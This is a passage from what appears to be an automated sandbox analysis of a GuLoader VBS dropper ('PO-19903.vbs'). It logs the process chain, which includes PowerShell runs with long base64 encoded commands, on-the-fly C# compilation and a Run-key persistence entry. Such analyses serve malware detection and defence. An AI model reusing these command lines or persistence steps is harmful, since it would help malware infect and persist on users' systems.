AE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcw
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdlineJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DC.tmp" "c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP"Jump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Touchb.vbs" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcwJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220512Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\OVER.datJump to behavior
    Source: classification engineClassification label: mal100.troj.evad.winVBS@15/12@15/5
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMutant created: \Sessions\1\BaseNamedObjects\oMDTItPV
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8852:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8852:120:WilError_03
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.pdb source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000009.00000000.4302405352.0000000000630000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085EB2FE push eax; iretd 2_2_085EB2FF
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_085EB4F6 pushad ; iretd 2_2_085EB4F7
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08639C98 pushfd ; ret 2_2_08639E0D
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08639DF0 pushfd ; ret 2_2_08639E0D
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08670028 push esp; retf 2_2_08670031
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_086731AC pushad ; iretd 2_2_086731AD
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0874FB90 push 00000008h; ret 2_2_0874FBA0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0874A200 push 00000008h; ret 2_2_0874A210
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087F58D0 push eax; retf 2_2_087F58D1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087F43E8 pushad ; ret 2_2_087F43E9
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_087F44F0 pushfd ; ret 2_2_087F44F1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F692E2 push eax; mov dword ptr [esp], edx2_2_08F692F4
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.dllJump to dropped file
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DenialschJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DenialschJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
